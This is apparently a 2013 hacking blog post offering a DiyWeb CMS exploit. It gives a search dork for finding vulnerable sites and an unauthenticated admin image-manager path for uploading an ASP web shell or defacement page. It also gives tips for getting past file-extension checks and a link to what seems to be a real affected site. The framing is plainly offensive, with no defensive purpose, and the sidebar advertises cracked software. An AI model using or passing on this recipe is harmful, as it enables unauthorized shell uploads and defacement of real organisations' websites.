DiyWeb Admin Bypass and Remote file/shell Upload exploit

byally -September 21, 2013

0

Exploit title : DiyWeb Admin Bypass and & file Upload exploit
Discovered By : NoentryPhc
Sever : windows
Type : web application
Shell extention : .asp

Dork : "Power by DiyWeb"
inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
This exploit's almost all vulnerable websites are Malaysiyan.
To upload your files Goto : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
if .php extention is not allowed then your can try tamper data and live http headers
to acess your file goto : http://www.website.com/Images/yourfilehere and sometimes you have to find your manually on websites

Link:http://www.famosapadu.com.my/images/index.html

Tags tecnologia

DiyWeb Admin Bypass and Remote file/shell Upload exploit

Post a Comment

Anti-Porn 17.6.3.6 Software Full Version With Patch

Categories

Main Tags

Latest Posts

Popular Posts

Anti-Porn 17.6.3.6 Software Full Version With Patch

HOW TO UNLOCK HUAWEI E586 MIFI-ROUTER

How to setup your own LAB for Sql injection and XSS #Ethical hacking

Contact Form